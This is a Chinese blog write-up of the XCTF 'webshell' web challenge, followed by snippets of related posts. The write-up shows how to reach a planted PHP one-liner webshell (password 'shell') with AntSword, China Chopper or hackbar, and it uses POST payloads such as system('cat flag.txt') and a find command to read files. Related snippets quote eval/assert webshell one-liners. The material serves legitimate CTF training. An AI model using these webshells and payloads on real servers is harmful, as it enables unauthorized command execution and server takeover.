ctf-攻防世界-web:webshell

已于 2022-09-05 18:58:58 修改
阅读量1.5k 收藏 1
点赞数
分类专栏: # web 文章标签: shell unctf
于 2021-11-08 19:46:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62619559/article/details/121214468
版权

 提示webshell在index.php里面,那就打开场景看看:

显然是一句话木马,密码为shell。

用菜刀或者蚁剑链接一句话,即可找到flag:

 

3.也可以使用hackbar,使用post方式传递shell=system(ls)列出目录   shell=system('cat flag.txt'); 获得flag

shell = system(“find / -name ‘flag*’”);

 

蚁剑下载地址https://github.com/AntSwordProject/antSword/releases

2021gracedoudou
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctf-br.github.io:CTF-BR
07-06
1. **博客文章**:CTF-BR博客中包含了一系列关于网络安全、漏洞挖掘、逆向工程、密码学和Web安全等方面的文章。这些文章通常由社区成员贡献,旨在分享他们在解决CTF挑战过程中的经验和技巧。 2. **教程与指南**:...
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
CTF-Web-[极客大挑战 2019]Upload
归子莫的博客
05-03 4989
CTF-Web-[极客大挑战 2019]Upload 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges 题目 Web类,[极客大挑战 2019]Upload 打开题目的实例 思路 做一个phtml的文件 将...
ctf-web-攻防世界基础题-webshell
baola的博客
07-25 2187
通过这题了解webshell原理,学会编webshell
【玄机】-----应急响应
最新发布
m0_63138919的博客
05-13 2595
玄机应急响应 题解 一起学习
ctf web shell
god_001的博客
04-08 3185
题目: 打开网址,发现一片空白,回来查看提示描述,经过分析发现,描述可等同于: 这是一个可变函数的应用,实际运行就等同于执行assert($_GET['s']); assert()函数在php语言中是用来判断一个表达式是否成立的,返回true or false; 重要的是函数括号内的语句会被执行。 因此,只要通过s传指令,就可以得到想要的结果,首先查看当前目录: http://114.67.175.224:18164/?s=system('ls') 发现当前目录有两个文件,再打.
CTfwebshell
m0_62102520的博客
07-06 371
步骤:请确保能互相ping通,将一句话木马放到phpstudy目录下的www目录下,配置好密码,通过蚁剑链接。不含之母数字的webshell
CTF-web 第十部分 webshell基础与免杀
热门推荐
iamsongyu的博客
11-15 1万+
一、什么是webshell (1)webshell简介         webshell,顾名思义:web指的是在web服务器上,而shell是用脚本语言编的脚本程序,webshell就是就是web的一个管理工具,可以对web服务器进行操作的权限,也叫webadmin。webshell一般是被网站管理员用于网站管理、服务器管理等等一些用途,但是由于webshell的功能比较强大,可以上传下载...
CTF -攻防世界-web新手区
aon8069924165211的博客
08-05 376
直接f12出来 先用get后加/?a=1 然后火狐装hackbar(老版本)f12 post b=2 搞定 Hackbar:https://github.com/Mr-xn/hackbar2.1.3 更简单 直接/robots.txt 有一个php网页 再加在后面打开就行 蜘蛛扫描可以访问的网页 直接/index.php.bar 会下载一个.bar文件 ...
CTF-Web-Challenge:使用PHP在Web中进行CTF挑战
03-25
在这个"CTF-Web-Challenge"中,你将有机会学习和实践如何在Web环境中识别和利用漏洞。 PHP是一种广泛使用的服务器端脚本语言,特别适合开发动态网站。在CTF挑战中,你可能会遇到的PHP相关知识点包括: 1. **PHP...
Web-CTF-Cheatsheet:Web CTF速查表:cat:
04-29
WEB CTF备忘单 目录 MySQL 微软SQL Oracle SQLite的 PostgreSQL MS Access LFI 上载 序列化 PHP序列化 Python泡菜 Ruby元帅 Ruby YAML Java序列化 .NET序列化 SSTI / CSTI Flask / Jinja2 嫩枝/ Symfony ...
CTF-AWD-WEB:AWD 模式下的WEB试题仓库
05-17
这个资源库"CTF-AWD-WEB-master"提供的试题将帮助参与者提升他们的实战技能,深入理解Web安全攻防的原理,并能够在实际环境中应用这些知识。通过解题,不仅可以锻炼漏洞挖掘和修复能力,还可以提升安全意识,对于...
网络安全CTF流量分析-入门3-Webshell连接流量分析
m0_51198141的博客
09-03 1427
同上一问,将frp文件内容解码,得到账户是 0HDFt16cLQJ 密码是JTN276Gp。所以答案就是 Admin123!
XCTF WEB webshell
无限迭代中......
06-30 1685
https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=0&id=5070 版本一 题解:修改HTML代码提交一个shell的变量 变量值是webshell命令 ​​​​​​​<form action="http://111.198.29.45:36317/index.php" meth...
攻防世界(WEB) webshell
qq_54929891的博客
08-25 941
做之前先了解了一下webshell是个什么东西 webshell,顾名思义:web指的是在web服务器上,而shell是用脚本语言编的脚本程序,webshell就是就是web的一个管理工具,可以对web服务器进行操作的权限,也叫webadmin。webshell一般是被网站管理员用于网站管理、服务器管理等等一些用途,但是由于webshell的功能比较强大,可以上传下载文件,查看数据库,甚至可以调用一些服务器上系统的相关命令(比如创建用户,修改删除文件之类的),通常被黑客利用,黑客通过一些上传方式,将自己
ctf web方向与php学习记录7之webshell初见
这周末在做梦的博客
08-27 482
webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。 顾名思义,“web”的含义是显然需要服务器开放web服务,“shell”的含义是取得对服务器某种程度上操作权限。webshell常常被称为入侵者通过网站端口对网站服务器的某种程度上操作的权
攻防世界XCTFweb新手练习区⑩/webshell
其名为碰
11-09 1143
题目 解题 1.进入看到显示 然后我们可以得到这个一句话的密码是shell 2.使用蚁剑 1)右键单击空白处添加数据 2)输入地址和密码连接 连接成功 看到FLAG,打开flag.txt 得到FLAG ...
BugkuCTFweb题之求getshell
A_dmin的博客
12-09 3018
BugkuCTFweb题之求getshell 一进来发现: maybe时绕过,那就用一句话木马吧!! php的一句话是:&amp;lt;?php @eval($_POST['pass']);?&amp;gt; asp的一句话是:&amp;lt;%eval request (&quot;pass&quot;)%&amp;gt; aspx的一句话是:&amp;lt;%@ Page Language=&quot;Jscript&amp
CTFweb题库笔记(难度1)
cocoaiu的博客
08-11 8131
CTF笔记
CTF PHP代码注入
07-15
CTF(Capture The Flag)竞赛中,常见的一个攻击技术是PHP代码注入(PHP Code Injection)。这种攻击利用了应用程序对用户输入的不充分验证和过滤,使得攻击者能够将恶意的PHP代码注入到应用程序中,从而执行任意代码或实施其他攻击。 以下是一些常见的PHP代码注入漏洞场景和防范措施: 1. 用户输入的直接执行:如果应用程序直接将用户输入作为PHP代码执行,而没有进行充分的验证和过滤,攻击者可以通过提交恶意代码来执行任意操作。防范措施是使用合适的输入验证和过滤,例如使用白名单来限制允许的操作或使用安全的函数来处理用户输入。 2. 变量覆盖:如果应用程序在解析用户输入时,没有正确处理变量覆盖的情况,攻击者可以通过构造特殊的输入来覆盖应用程序中的变量,并执行恶意操作。防范措施是在处理用户输入之前,将其赋值给新的变量,并确保不会被覆盖已有的变量。 3. 文件包含漏洞:如果应用程序在包含文件时没有进行充分的验证和过滤,攻击者可以通过构造特殊的文件路径来包含恶意的PHP代码文件。防范措施是使用白名单来限制允许包含的文件路径,并对用户输入进行适当的过滤和验证。 4. 数据库查询注入:虽然不是直接的PHP代码注入,但数据库查询注入漏洞可能导致执行恶意的SQL语句,从而进一步执行PHP代码。防范措施是使用参数化查询或预处理语句,避免直接将用户输入拼接到SQL查询中。 总之,要防范PHP代码注入漏洞,开发者应该始终进行充分的输入验证和过滤,使用安全的函数和方法处理用户输入,避免直接执行或拼接用户输入作为代码执行。同时,定期更新和修复应用程序中使用的框架、库和组件,以确保使用的是最新的安全版本。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值